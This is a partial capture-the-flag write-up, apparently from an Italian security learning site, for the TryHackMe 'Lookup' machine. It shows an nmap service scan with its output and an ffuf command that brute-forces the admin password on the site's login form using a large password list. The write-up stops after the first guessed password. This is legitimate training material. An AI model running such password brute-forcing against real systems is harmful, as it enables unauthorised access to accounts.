Lorenzo Bruno
Italian
Italian
  • Welcome on board
  • HackTheBox
    • Quickstart
      • Writeups
        • TwoMillion
        • LinkVortex
        • Chemistry
        • Titanic
        • Moon
  • TryHackMe
    • Quickstart
      • Writeups
        • Pickle Rick
        • Pyrat
        • Lookup
        • Vulnversity
      • Advent of Cyber 2024
        • Writeups
          • Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?
          • Day 2: One man's false positive is another man's potpourri.
          • Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.
          • Day 4: I’m all atomic inside!
  • Sviluppo Malware
    • Basi
  • Corso python
    • Benvenuti
      • Esercizi
        • esercizio_01
        • esercizio_02
        • esercizio_03
        • esercizio_04
        • esercizio_05
        • esercizio_06
        • esercizio_07
        • esercizio_08
        • esercizio_09
        • esercizio_10: Challenge
        • esercizio_11
        • esercizio_12
        • esercizio_13
        • esercizio_14
        • esercizio_15: Challenge n.2
        • esercizio_16
        • esercizio_17
      • Slide
      • Hall of fame
  • Useful websites and materials
Powered by GitBook
On this page
  1. TryHackMe
  2. Quickstart
  3. Writeups

Lookup

Test your enumeration skills on this boot-to-root machine.

Per risolvere questa challenge dobbiamo ottenere due flag:

  • User flag

  • Root flag

Enumeration

Partiamo con la fase di enumeration

$ nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 21:d4:44:b1:43:e3:a2:ca:51:b6:2f:dd:5a:ff:45:98 (RSA)
|   256 51:57:da:91:fd:9c:38:ec:24:b2:21:d7:f5:e0:cf:69 (ECDSA)
|_  256 68:dc:d7:0b:94:e6:c4:d1:62:ca:8b:a1:c2:d1:e9:6d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check port 80 on our browser.

ffuf -u http://lookup.thm/login.php -X POST -d "username=admin&password=FUZZ" -w /home/kali/Documents/Hacking_stuff/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -H "Content-Type: application/x-www-form-urlencoded" -fs 62 
________________________________________________

password123    [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 66ms]

La risposta è diversa in dimensione ma se proviamo ad inserire la combinazione admin:password123 viene restituito nuovamente errore in fase di login.

Questo potrebbe suggerire che forse abbiamo trovato la password giusta ma per lo username sbagliato.

PreviousPyratNextVulnversity

Last updated 3 months ago

Source code for the page
Page cover image